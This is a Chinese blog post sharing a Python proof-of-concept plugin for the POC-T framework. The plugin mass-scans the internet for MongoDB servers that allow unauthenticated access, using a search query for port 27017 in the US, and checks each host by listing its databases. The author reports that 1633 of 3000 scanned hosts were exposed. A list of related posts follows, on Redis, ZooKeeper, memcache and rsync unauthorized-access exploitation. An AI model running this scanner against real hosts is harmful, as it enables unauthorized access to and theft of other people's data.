2. 程式人生 > >mongodb未授權訪問指令碼

mongodb未授權訪問指令碼

阿新 發佈:2018-12-18

有事候知識整合起來會發生很大的威力,嘗試著寫了一個poc來測試mongodb的未授權訪問漏洞,發現危害還是很大的。

把指令碼放在https://github.com/Xyntax/POC-T,框架的script目錄下面。指令碼僅供學習:要安裝pymongo 

#!/usr/bin/python
# -*- coding: UTF-8 -*-

"""
moogodb未授權訪問

Usage:
  python POC-T.py -s mongodb-unauth -aZ "port:27017 country:us"

"""


import socket
import sys
import pymongo
from plugin.util import host2IP
from plugin.util import checkPortTcp

def poc(url):
	url = host2IP(url)
	ip = url.split(':')[0]
	try:
		if not checkPortTcp(ip,27017):
			return False
		if testConnect(ip,27017):
			return ip
	except Exception,e:
		return False
	return False

def testConnect(ip,port=27017):
	global dbname
	try:
		conn = pymongo.MongoClient(ip,27017,socketTimeoutMS=3000)
		dbname = conn.database_names()
		#print dbname
		if dbname:
			return True
	except Exception,e:
		return False

以關鍵字搜尋,掃了3000個,有1633個存在漏洞。


相關推薦

mongodb授權訪問指令碼

有事候知識整合起來會發生很大的威力,嘗試著寫了一個poc來測試mongodb的未授權訪問漏洞,發現危害還是很大的。 把指令碼放在https://github.com/Xyntax/POC-T,框架的script目錄下面。指令碼僅供學習:要安裝pymongo  #!/usr

zooker授權訪問指令碼

# coding=utf-8 import socket     def get_plugin_info():     plugin_info = {         "name": "Zookeeper未授權訪問"

MongoDB資料庫授權訪問漏洞及加固

近日安全團隊經檢測發現部分阿里雲使用者存在MongoDB資料庫未授權訪問漏洞,漏洞危害嚴重,可以導致資料庫資料洩露或被刪除勒索,從而造成嚴重的生產事故。為保證您的業務和應用的安全,提供以下修復漏洞指導方案。 具體漏洞詳情如下: 1.漏洞危害 開啟Mon

Redis 授權訪問漏洞(附Python腳本)

dir for return -s src acl save 密碼 password 0x01 環境搭建 #下載並安裝 cd /tmp wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzf r

redis 授權訪問漏洞和防範

redis通過nmap掃描開放redis 6379端口本機安裝redis客戶端,能連接遠端redis數據庫;(redis-cli)本機創建私鑰和公鑰,ssh-keygen -t rsa 一路回車;會在/root/.ssh/下生成私鑰文件id_rsa和公鑰id_rsa.pubredis-cli -h 192.1

ZooKeeper 授權訪問漏洞

tps blog keep star tmp 服務 datadir pre cfg ZooKeeper 安裝: Zookeeper的默認開放端口是2181 wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeep

memcache漏洞--被授權訪問,並作為肉雞發動DDOS攻擊

memcache redis linux 漏洞修復 漏洞描述:memcache是一套常用的key-value緩存系統,由於它本身沒有權限控制模塊,所以開放在外網的memcache服務很容易被攻擊者掃描發現,通過命令交互可直接讀取memcache中的敏感信息。修復方案:因memcache無權限控

Redis授權訪問反彈shell

shell conf 授權 shel TP edi 10.10 info image Redis未授權訪問反彈shell 目標主機:10.104.11.178 攻擊機:kali 攻擊步驟: 1.與目標主機連接 root@kali:~# /usr/redis/redis-c

你的數據安全麽?Hadoop再曝安全漏洞| 黑客利用Hadoop Yarn資源管理系統授權訪問漏洞

分布式摘要: 4月30日,阿裏雲發現,俄羅斯黑客利用Hadoop Yarn資源管理系統REST API未授權訪問漏洞進行攻擊。 Hadoop是一款由Apache基金會推出的分布式系統框架,它通過著名的 MapReduce 算法進行分布式處理,Yarn是Hadoop集群的資源管理系統。4月30日,阿裏雲發現,俄

Redis授權訪問

總結 AR HR 簡單 mage col 根目錄 IT ros 最近在做校招題目的時候發現有問到未授權訪問,特此搭建了諸多未授權訪問的環境並且一一復現並做簡單總結。再此記錄下來 環境介紹 0x00環境搭建 我這裏用到的是Microsoft(R) Windows(R)

zookeeper授權訪問掃描腳本

repo odin data get level In AC exc ack # coding=utf-8 import socket def get_plugin_info(): plugin_info = { "name": "Zookee

redis配置文件與授權訪問

req bin ger only 文件 RF BSD協議 into 登錄 redis配置文件與未授權訪問 0x00 redis簡述 REmote DIctionary Server(Redis) 是一個由Salvatore Sanfilippo寫的key-value存儲系統

Rsync授權訪問漏洞的利用和防禦

fas 分享圖片 敏感信息泄露 syn name src com 敏感信息 驗證 首先Rsync未授權訪問利用 該漏洞最大的隱患在於寫權限的開啟,一旦開啟了寫權限,用戶就可以,用戶就可以利用該權限寫馬或者寫一句話,從而拿到shell。 我們具體來看配置文件的網相關選項(

Redis 授權訪問漏洞

訪問 分享圖片 文件 process start 溝通 images oauth 使用 公司的服務器被掃出redis相關漏洞,未授權的訪問漏洞!就是應為沒有設置密碼,所以被掃描出漏洞,設置個密碼就完事修改配置文件Redis的配置文件默認在/etc/redis.conf,找到

3. Mongodb 設定授權訪問

基於Docker部署一個數據庫例項通常比直接在伺服器上安裝資料庫還要簡單,Gevin在開發環境中經常使用基於docker的資料庫服務,docker也漸漸成為Gevin在Linux上安裝MongoDB的首選方式,由於MongoDB預設是不用通過認證就能直接連線的,出於安全考慮,在公網上部署

系統滲透漏洞の授權訪問

背景:     我們做的頁面是巢狀在營銷系統中,所以沒有登入介面,造成了直接訪問 ip:port/地址可以進入,這樣造成了安全隱患 思路;     想到了加上過濾器,在使用者登入成功之後,才授權登入訪問頁面(當用戶登入成功後,將使用者資訊存在sessio

墨者學院 - rsync授權訪問漏洞利用

關於rsync語句解釋連結如下 http://man.linuxde.net/rsync   [email protected]:~# rsync -v rsync://ip [email protected]:~# rsync -v rsync:/

ElasticSearch授權訪問

0x00 漏洞描述: Elasticsearch是一款java編寫的企業級搜尋服務。越來越多的公司使用ELK作為日誌分析,啟動此服務預設會開放9200埠,可被非法操作資料 0x01 修復建議: 1、防火牆上設定禁止外網訪問9200埠。 2、使用Nginx搭建反向代理,通過配置

rsync授權訪問漏洞利用

rsync常用 文件 技術分享 備份工具 我們 掃描端口 最小 info 方法 漏洞描述:rsync是Linux系統下的數據鏡像備份工具,使用快速增量備份工具Remote Sync可以遠程同步,支持本地復制,或者與其他ssh,rsync主機同步。 漏洞利用:它的默認端口號是

一次Redis授權訪問漏洞入侵分析

0x00 簡介 通過之前部署的蜜罐系統,我近日在滴滴雲上捕獲到了一個通過 Redis 未授權訪問漏洞進行入侵的蠕蟲樣本,該樣本的特點是使用 Python 指令碼進行橫向漏洞掃描,並且具有程序隱藏和解除安裝某些雲上安全產品的功能。 0x01 樣本分析 通過蜜罐日誌得到攻擊者入侵開始